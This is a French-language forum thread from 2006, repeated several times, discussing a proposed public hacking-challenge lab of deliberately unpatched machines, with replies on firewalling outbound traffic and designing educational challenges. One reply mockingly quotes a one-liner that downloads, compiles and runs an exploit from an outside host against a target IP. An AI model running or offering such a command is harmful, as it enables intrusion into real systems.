Toujours dans l'optique des challenges.
Histoire de donner du piquant aux choses.
Supposons que j'aie à ma disposition une petite dizaine de machines assez
vieilles.
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans
aucun SP, une Debian avec un kernel troué,...).
Et supposons que je propose au gens d'en exploiter les failles.
Disons que je réinstalle la machine à l'identique une fois par semaine (ou
à chaque fois que je détecte que la faille est exploitée) Est-ce que vous
pensez que ça pourrait interesser du monde? Les machines seraient derriere
un routeur (une machine Linux non trouée), ou alors, si ça marche bien, je
peux faire installer une ligne ADSL pour chaque machine...
L'interet est que les gens trouveraient pet-être plus interessant de faire
un exploit au travers d'internet. en effet c'est toujours possible de
faire ça sur son propre LAN, mais c'est plus excitant vraiment à distance.
Le but sera de vraiment rester dans un niveau assez bas, avec
éventuellement des tutoriaux au fil du temps pour démontrer la chose...
Installer plusieurs lignes ADSL (et aussi faire tourner des machines) ça
aura un cout, que notre association peut supporter si ça interesse du
monde, mais d'après vous ça peut en interesser?
Cette action est irreversible, confirmez la suppression du commentaire ?
Signaler le commentaire
Veuillez sélectionner un problème
Nudité
Violence
Harcèlement
Fraude
Vente illégale
Discours haineux
Terrorisme
Autre
Eric Razny
Le Tue, 25 Apr 2006 21:59:18 +0000, R12y a écrit :
Bonjour,
[installation de machines volontairement trouées]
Les machines seraient derriere un routeur (une machine Linux non trouée), ou alors, si ça marche bien, je peux faire installer une ligne ADSL pour chaque machine...
Juste une suggestion : fais gaffe aux paramètres du routeur/fw, en particulier pour les flux en sortie. Ce serais dommage que ta machine trouée serve à faire un spamming en règle ou serve de relais à des attaques.
Pour le reste j'ai tendance à croire que tu vas plus te rammasser des kiddies en goguette que des gens qui cherchent vraiment (sinon compiler un exploit publié puis vérifier que ça marche c'est sympa 5mn puis bof :) ).
Par contre ça peut avoir un effet positif pour expliquer que les "out of the box" <provoc>xBSD inclus</provoc>[1] direct sur le net, c'est mal.
Eric
[1] : voir la phrase en rouge sur : http://www.openbsd.org/ ;)
Le Tue, 25 Apr 2006 21:59:18 +0000, R12y a écrit :
Bonjour,
[installation de machines volontairement trouées]
Les machines
seraient derriere un routeur (une machine Linux non trouée), ou alors, si
ça marche bien, je peux faire installer une ligne ADSL pour chaque
machine...
Juste une suggestion : fais gaffe aux paramètres du routeur/fw, en
particulier pour les flux en sortie. Ce serais dommage que ta machine
trouée serve à faire un spamming en règle ou serve de relais à des
attaques.
Pour le reste j'ai tendance à croire que tu vas plus te rammasser des
kiddies en goguette que des gens qui cherchent vraiment (sinon compiler un
exploit publié puis vérifier que ça marche c'est sympa 5mn puis bof :) ).
Par contre ça peut avoir un effet positif pour expliquer que les "out of
the box" <provoc>xBSD inclus</provoc>[1] direct sur le net, c'est mal.
Eric
[1] : voir la phrase en rouge sur :
http://www.openbsd.org/
;)
Le Tue, 25 Apr 2006 21:59:18 +0000, R12y a écrit :
Bonjour,
[installation de machines volontairement trouées]
Les machines seraient derriere un routeur (une machine Linux non trouée), ou alors, si ça marche bien, je peux faire installer une ligne ADSL pour chaque machine...
Juste une suggestion : fais gaffe aux paramètres du routeur/fw, en particulier pour les flux en sortie. Ce serais dommage que ta machine trouée serve à faire un spamming en règle ou serve de relais à des attaques.
Pour le reste j'ai tendance à croire que tu vas plus te rammasser des kiddies en goguette que des gens qui cherchent vraiment (sinon compiler un exploit publié puis vérifier que ça marche c'est sympa 5mn puis bof :) ).
Par contre ça peut avoir un effet positif pour expliquer que les "out of the box" <provoc>xBSD inclus</provoc>[1] direct sur le net, c'est mal.
Eric
[1] : voir la phrase en rouge sur : http://www.openbsd.org/ ;)
Nicob
On Tue, 25 Apr 2006 21:59:18 +0000, R12y wrote:
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans aucun SP, une Debian avec un kernel troué,...). Et supposons que je propose au gens d'en exploiter les failles.
Il va falloir exploiter des failles connues, ce qui risque d'être assez peu marrant. Il serait plus drôle de corser un peu la chose :
- pour une appli Web, mettre devant un mod_rewrite qui rejette l'exploit classique trouvé sur le Net - pour une faille Netbios/RPC, bloquer avec Snort (TCP RST) le path d'exploitation utilisé par les exploits courants
Mais bon, je trouve toujours plus marrant de coder un exploit fiable pour une faille privée en attaquant une machine parfaitement maitrisé (LAN + root/Admin + sniffer + débogueur + autres tools) que de faire un "wget hacker.ru/killer.c && gcc -killer.c -o killer && ./killer -h your_ip" ;-)
Sinon, pour ceux qui veulent être sûr qu'une faille est présente avant de commencer leur recherche (ben ouais, les failles privées, on ne sait jamais qu'elles sont là avant de les avoir trouvé ;-), il y a pulltheplug.org ...
Nicob
On Tue, 25 Apr 2006 21:59:18 +0000, R12y wrote:
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans
aucun SP, une Debian avec un kernel troué,...). Et supposons que je
propose au gens d'en exploiter les failles.
Il va falloir exploiter des failles connues, ce qui risque d'être assez
peu marrant. Il serait plus drôle de corser un peu la chose :
- pour une appli Web, mettre devant un mod_rewrite qui rejette l'exploit
classique trouvé sur le Net
- pour une faille Netbios/RPC, bloquer avec Snort (TCP RST) le path
d'exploitation utilisé par les exploits courants
Mais bon, je trouve toujours plus marrant de coder un exploit fiable pour
une faille privée en attaquant une machine parfaitement maitrisé (LAN +
root/Admin + sniffer + débogueur + autres tools) que de faire un "wget
hacker.ru/killer.c && gcc -killer.c -o killer && ./killer -h your_ip" ;-)
Sinon, pour ceux qui veulent être sûr qu'une faille est présente avant
de commencer leur recherche (ben ouais, les failles privées, on ne sait
jamais qu'elles sont là avant de les avoir trouvé ;-), il y a
pulltheplug.org ...
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans aucun SP, une Debian avec un kernel troué,...). Et supposons que je propose au gens d'en exploiter les failles.
Il va falloir exploiter des failles connues, ce qui risque d'être assez peu marrant. Il serait plus drôle de corser un peu la chose :
- pour une appli Web, mettre devant un mod_rewrite qui rejette l'exploit classique trouvé sur le Net - pour une faille Netbios/RPC, bloquer avec Snort (TCP RST) le path d'exploitation utilisé par les exploits courants
Mais bon, je trouve toujours plus marrant de coder un exploit fiable pour une faille privée en attaquant une machine parfaitement maitrisé (LAN + root/Admin + sniffer + débogueur + autres tools) que de faire un "wget hacker.ru/killer.c && gcc -killer.c -o killer && ./killer -h your_ip" ;-)
Sinon, pour ceux qui veulent être sûr qu'une faille est présente avant de commencer leur recherche (ben ouais, les failles privées, on ne sait jamais qu'elles sont là avant de les avoir trouvé ;-), il y a pulltheplug.org ...
Nicob
Stephane Catteau
R12y n'était pas loin de dire :
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans aucun SP, une Debian avec un kernel troué,...). Et supposons que je propose au gens d'en exploiter les failles.
Si je reste dans l'optique avec laquelle j'avais abordé le sujet, c'est un bon moyen pour les apprentis[1] d'acquérir un peu de confiance. Lorsque c'est sa machine que l'on attaque, on a un avantage, psychologiquement parlant, puisque l'on sait très précisément ce qu'il y a dessus. De plus, lorsque l'on débute on est tenté de garder un oeil dessus ; si on se plante dans l'exploitation d'une faille sur linux/Unix, un petit coup d'oeil sur les logs peut parfois aider a comprendre où et pourquoi on s'est planté. Bref, on fini par avoir l'expérience, mais pas la confiance. La même faille sur une machine appartenant a un tiers oblige a travailler en semi aveugle ("semi" parce que l'on sait ce qui est exploitable), et donc d'acquérir cette confiance. Donc, de ce point de vue là, l'idée est bonne. Cependant, comme le dit Eric, tu risques de te ramasser la plus part des kiddies. Si tu as suffisement de bande passante, bah après tout, tant qu'ils s'occupent de ta machine, au moins ils ne chercheront pas a pourrir la mienne ;-) Par contre, toujours en accord avec Eric, il faudra évidement penser à blinder tout ce qu'il y a autour, pour que cela ne serve pas de relais.
Je suis aussi d'accord avec Nicob en ce qui concerne le côté défi, mais comme je l'ai dit, je préfère me placer dans une optique de débutant, donc l'exploitation d'une faille, même éculée est en soit une récompense pour eux, à défaut d'avoir été un défi. L'autre avantage étant que cela peut les inciter à aller plus loin. Une faille archie connue a un avantage, elle est aussi, relativement parlant, archie documentée. On peut donc essayer plusieurs variations autour de la-dite faille, ce qui aide a en comprendre le principe et, parce que la machine est vraiment distante, à comprendre les contraintes liées à cette distance. Par exemple, jouer sur le TTL des paquets sur un LAN, ne présente pas beaucoup d'intérêt, par contre cela peut en avoir dès que l'on se retrouve sur Le réseau.
En résumé, l'idée me semble bonne, mais peut-être pas à l'échelle d'une dizaine de machines. Un linux, un Windows et un Unix (BSD ?) troué au niveau du système, avec dessus quelques versions trouées de différents services, me semble suffisant pour ce qui est des débutants. Après, si l'idée te botte vraiment et si, pourquoi pas, la communauté francophone te suit, tu peux[2] utiliser les machines restantes pour des failles plus personnelles, présentants différents niveaux de défis. A noter au passage qu'un défi de niveau moindre n'est pas obligatoirement une faille simple a exploiter, cela peut aussi être une faille avec "indice". Par exemple, un ping envoyé vers "l'attaquant" avec un nombre impair d'octets dans les données pour dire qu'il se plante complètement, ou un "continue comme ça" retourné lorsqu'il a passé une étape clé. L'avantage de ce système étant multiple : 1) Une faille ardue voit sa difficulté baisser pour les débutants. 2) "L'attaquant" devra être en mesure d'accéder aux indices, donc s'intéresser aux réactions autant qu'à ce qu'il fait. 3) La présence des indices est pédagogique. Savoir que là on se plante encourage plus à chercher pourquoi que de continuer à se planter indéfiniment la tête contre le mur. 4) Dans une certaine limite cela peut foutre la merde dans les outils des kiddies. 5) Quelqu'un recherchant un challenge n'est pas obligé de compter le nombre d'octets data du ping qu'il a reçu, il ne verra donc pas les "indices".
[1] Et non les kiddies hein.
[2] Ou d'autres d'ailleurs.
Le but sera de vraiment rester dans un niveau assez bas, avec éventuellement des tutoriaux au fil du temps pour démontrer la chose..
Bref d'être éducatif, ce qui a forcément mon approbation ;-)
[...] mais d'après vous ça peut en interesser?
Je serais tenté de dire oui, reste à savoir si ce "monde" représente beaucoup de personnes. Si c'est fait dans une optique de pédagogie, je pense que n'importe quel amateur d'informatique pourrait être tenté d'essayer au moins une fois, qu'il veuille ou non se former à la sécurité. Après tout, c'est en comprenant comment une faille peut être exploitée que l'on est le mieux à même de protéger sa propre machine, et avec la montée en puissance des connexions haut-débit, le nombre de serveur personnel ouvert sur la toile a tendance à grimper en flèche. Reste à savoir si les-dits amateurs me suivront dans mon raisonnement, et là ma boule de cristal reste muette.
R12y n'était pas loin de dire :
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans
aucun SP, une Debian avec un kernel troué,...).
Et supposons que je propose au gens d'en exploiter les failles.
Si je reste dans l'optique avec laquelle j'avais abordé le sujet,
c'est un bon moyen pour les apprentis[1] d'acquérir un peu de
confiance. Lorsque c'est sa machine que l'on attaque, on a un avantage,
psychologiquement parlant, puisque l'on sait très précisément ce qu'il
y a dessus. De plus, lorsque l'on débute on est tenté de garder un oeil
dessus ; si on se plante dans l'exploitation d'une faille sur
linux/Unix, un petit coup d'oeil sur les logs peut parfois aider a
comprendre où et pourquoi on s'est planté. Bref, on fini par avoir
l'expérience, mais pas la confiance.
La même faille sur une machine appartenant a un tiers oblige a
travailler en semi aveugle ("semi" parce que l'on sait ce qui est
exploitable), et donc d'acquérir cette confiance. Donc, de ce point de
vue là, l'idée est bonne.
Cependant, comme le dit Eric, tu risques de te ramasser la plus part
des kiddies. Si tu as suffisement de bande passante, bah après tout,
tant qu'ils s'occupent de ta machine, au moins ils ne chercheront pas a
pourrir la mienne ;-) Par contre, toujours en accord avec Eric, il
faudra évidement penser à blinder tout ce qu'il y a autour, pour que
cela ne serve pas de relais.
Je suis aussi d'accord avec Nicob en ce qui concerne le côté défi,
mais comme je l'ai dit, je préfère me placer dans une optique de
débutant, donc l'exploitation d'une faille, même éculée est en soit une
récompense pour eux, à défaut d'avoir été un défi. L'autre avantage
étant que cela peut les inciter à aller plus loin. Une faille archie
connue a un avantage, elle est aussi, relativement parlant, archie
documentée. On peut donc essayer plusieurs variations autour de la-dite
faille, ce qui aide a en comprendre le principe et, parce que la
machine est vraiment distante, à comprendre les contraintes liées à
cette distance. Par exemple, jouer sur le TTL des paquets sur un LAN,
ne présente pas beaucoup d'intérêt, par contre cela peut en avoir dès
que l'on se retrouve sur Le réseau.
En résumé, l'idée me semble bonne, mais peut-être pas à l'échelle
d'une dizaine de machines. Un linux, un Windows et un Unix (BSD ?)
troué au niveau du système, avec dessus quelques versions trouées de
différents services, me semble suffisant pour ce qui est des débutants.
Après, si l'idée te botte vraiment et si, pourquoi pas, la communauté
francophone te suit, tu peux[2] utiliser les machines restantes pour
des failles plus personnelles, présentants différents niveaux de défis.
A noter au passage qu'un défi de niveau moindre n'est pas
obligatoirement une faille simple a exploiter, cela peut aussi être une
faille avec "indice". Par exemple, un ping envoyé vers "l'attaquant"
avec un nombre impair d'octets dans les données pour dire qu'il se
plante complètement, ou un "continue comme ça" retourné lorsqu'il a
passé une étape clé. L'avantage de ce système étant multiple :
1) Une faille ardue voit sa difficulté baisser pour les débutants.
2) "L'attaquant" devra être en mesure d'accéder aux indices, donc
s'intéresser aux réactions autant qu'à ce qu'il fait.
3) La présence des indices est pédagogique. Savoir que là on se plante
encourage plus à chercher pourquoi que de continuer à se planter
indéfiniment la tête contre le mur.
4) Dans une certaine limite cela peut foutre la merde dans les outils
des kiddies.
5) Quelqu'un recherchant un challenge n'est pas obligé de compter le
nombre d'octets data du ping qu'il a reçu, il ne verra donc pas les
"indices".
[1]
Et non les kiddies hein.
[2]
Ou d'autres d'ailleurs.
Le but sera de vraiment rester dans un niveau assez bas, avec
éventuellement des tutoriaux au fil du temps pour démontrer la chose..
Bref d'être éducatif, ce qui a forcément mon approbation ;-)
[...] mais d'après vous ça peut en interesser?
Je serais tenté de dire oui, reste à savoir si ce "monde" représente
beaucoup de personnes. Si c'est fait dans une optique de pédagogie, je
pense que n'importe quel amateur d'informatique pourrait être tenté
d'essayer au moins une fois, qu'il veuille ou non se former à la
sécurité. Après tout, c'est en comprenant comment une faille peut être
exploitée que l'on est le mieux à même de protéger sa propre machine,
et avec la montée en puissance des connexions haut-débit, le nombre de
serveur personnel ouvert sur la toile a tendance à grimper en flèche.
Reste à savoir si les-dits amateurs me suivront dans mon raisonnement,
et là ma boule de cristal reste muette.
Si j'installe dessus, un OS volontairement non corrigé (Ex: WinXP sans aucun SP, une Debian avec un kernel troué,...). Et supposons que je propose au gens d'en exploiter les failles.
Si je reste dans l'optique avec laquelle j'avais abordé le sujet, c'est un bon moyen pour les apprentis[1] d'acquérir un peu de confiance. Lorsque c'est sa machine que l'on attaque, on a un avantage, psychologiquement parlant, puisque l'on sait très précisément ce qu'il y a dessus. De plus, lorsque l'on débute on est tenté de garder un oeil dessus ; si on se plante dans l'exploitation d'une faille sur linux/Unix, un petit coup d'oeil sur les logs peut parfois aider a comprendre où et pourquoi on s'est planté. Bref, on fini par avoir l'expérience, mais pas la confiance. La même faille sur une machine appartenant a un tiers oblige a travailler en semi aveugle ("semi" parce que l'on sait ce qui est exploitable), et donc d'acquérir cette confiance. Donc, de ce point de vue là, l'idée est bonne. Cependant, comme le dit Eric, tu risques de te ramasser la plus part des kiddies. Si tu as suffisement de bande passante, bah après tout, tant qu'ils s'occupent de ta machine, au moins ils ne chercheront pas a pourrir la mienne ;-) Par contre, toujours en accord avec Eric, il faudra évidement penser à blinder tout ce qu'il y a autour, pour que cela ne serve pas de relais.
Je suis aussi d'accord avec Nicob en ce qui concerne le côté défi, mais comme je l'ai dit, je préfère me placer dans une optique de débutant, donc l'exploitation d'une faille, même éculée est en soit une récompense pour eux, à défaut d'avoir été un défi. L'autre avantage étant que cela peut les inciter à aller plus loin. Une faille archie connue a un avantage, elle est aussi, relativement parlant, archie documentée. On peut donc essayer plusieurs variations autour de la-dite faille, ce qui aide a en comprendre le principe et, parce que la machine est vraiment distante, à comprendre les contraintes liées à cette distance. Par exemple, jouer sur le TTL des paquets sur un LAN, ne présente pas beaucoup d'intérêt, par contre cela peut en avoir dès que l'on se retrouve sur Le réseau.
En résumé, l'idée me semble bonne, mais peut-être pas à l'échelle d'une dizaine de machines. Un linux, un Windows et un Unix (BSD ?) troué au niveau du système, avec dessus quelques versions trouées de différents services, me semble suffisant pour ce qui est des débutants. Après, si l'idée te botte vraiment et si, pourquoi pas, la communauté francophone te suit, tu peux[2] utiliser les machines restantes pour des failles plus personnelles, présentants différents niveaux de défis. A noter au passage qu'un défi de niveau moindre n'est pas obligatoirement une faille simple a exploiter, cela peut aussi être une faille avec "indice". Par exemple, un ping envoyé vers "l'attaquant" avec un nombre impair d'octets dans les données pour dire qu'il se plante complètement, ou un "continue comme ça" retourné lorsqu'il a passé une étape clé. L'avantage de ce système étant multiple : 1) Une faille ardue voit sa difficulté baisser pour les débutants. 2) "L'attaquant" devra être en mesure d'accéder aux indices, donc s'intéresser aux réactions autant qu'à ce qu'il fait. 3) La présence des indices est pédagogique. Savoir que là on se plante encourage plus à chercher pourquoi que de continuer à se planter indéfiniment la tête contre le mur. 4) Dans une certaine limite cela peut foutre la merde dans les outils des kiddies. 5) Quelqu'un recherchant un challenge n'est pas obligé de compter le nombre d'octets data du ping qu'il a reçu, il ne verra donc pas les "indices".
[1] Et non les kiddies hein.
[2] Ou d'autres d'ailleurs.
Le but sera de vraiment rester dans un niveau assez bas, avec éventuellement des tutoriaux au fil du temps pour démontrer la chose..
Bref d'être éducatif, ce qui a forcément mon approbation ;-)
[...] mais d'après vous ça peut en interesser?
Je serais tenté de dire oui, reste à savoir si ce "monde" représente beaucoup de personnes. Si c'est fait dans une optique de pédagogie, je pense que n'importe quel amateur d'informatique pourrait être tenté d'essayer au moins une fois, qu'il veuille ou non se former à la sécurité. Après tout, c'est en comprenant comment une faille peut être exploitée que l'on est le mieux à même de protéger sa propre machine, et avec la montée en puissance des connexions haut-débit, le nombre de serveur personnel ouvert sur la toile a tendance à grimper en flèche. Reste à savoir si les-dits amateurs me suivront dans mon raisonnement, et là ma boule de cristal reste muette.
Eric Lalitte
"R12y" wrote in message news:
Le but sera de vraiment rester dans un niveau assez bas, avec éventuellement des tutoriaux au fil du temps pour démontrer la chose... Installer plusieurs lignes ADSL (et aussi faire tourner des machines) ça aura un cout, que notre association peut supporter si ça interesse du monde, mais d'après vous ça peut en interesser?
Si tu pars dans cette optique tu pourrais mettre au goût du jour des attaques de type réseau. Je n'ai pas vu de challenges qui en proposaient alors qu'il existe pas mal de failles basées là dessus (ipid, numéros de séquence prédictibles, os fingerprinting, etc.) Enfin, si tu as plusieurs machines à disposition c'est envisageable.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
"R12y" <mihamina.rakotomandimby@etu.univ-orleans.fr> wrote in message
news:pan.2006.04.25.21.10.45.587196@etu.univ-orleans.fr
Le but sera de vraiment rester dans un niveau assez bas, avec
éventuellement des tutoriaux au fil du temps pour démontrer la chose...
Installer plusieurs lignes ADSL (et aussi faire tourner des machines) ça
aura un cout, que notre association peut supporter si ça interesse du
monde, mais d'après vous ça peut en interesser?
Si tu pars dans cette optique tu pourrais mettre au goût du jour des
attaques de type réseau. Je n'ai pas vu de challenges qui en proposaient
alors qu'il existe pas mal de failles basées là dessus (ipid, numéros de
séquence prédictibles, os fingerprinting, etc.)
Enfin, si tu as plusieurs machines à disposition c'est envisageable.
--
Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
Le but sera de vraiment rester dans un niveau assez bas, avec éventuellement des tutoriaux au fil du temps pour démontrer la chose... Installer plusieurs lignes ADSL (et aussi faire tourner des machines) ça aura un cout, que notre association peut supporter si ça interesse du monde, mais d'après vous ça peut en interesser?
Si tu pars dans cette optique tu pourrais mettre au goût du jour des attaques de type réseau. Je n'ai pas vu de challenges qui en proposaient alors qu'il existe pas mal de failles basées là dessus (ipid, numéros de séquence prédictibles, os fingerprinting, etc.) Enfin, si tu as plusieurs machines à disposition c'est envisageable.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
Elboras
si c'est des failles connu avec un exploit downloadable, comme certain l'on dit c'est un peu sans interet.
Des que tu rentre dans le challenge ou il faut réfléchir pour rentrer dans la box, cela pourrait attirer du monde.
Une chose est sur, beaucoup voudront squatter ensuite ta bande passante, utiliser tes ordis comme centre de spam, comme serveur perso, comme scanner, proxy ...
si c'est des failles connu avec un exploit downloadable, comme certain
l'on dit c'est un peu sans interet.
Des que tu rentre dans le challenge ou il faut réfléchir pour rentrer
dans la box, cela pourrait attirer du monde.
Une chose est sur, beaucoup voudront squatter ensuite ta bande
passante, utiliser tes ordis comme centre de spam, comme serveur perso,
comme scanner, proxy ...
si c'est des failles connu avec un exploit downloadable, comme certain l'on dit c'est un peu sans interet.
Des que tu rentre dans le challenge ou il faut réfléchir pour rentrer dans la box, cela pourrait attirer du monde.
Une chose est sur, beaucoup voudront squatter ensuite ta bande passante, utiliser tes ordis comme centre de spam, comme serveur perso, comme scanner, proxy ...
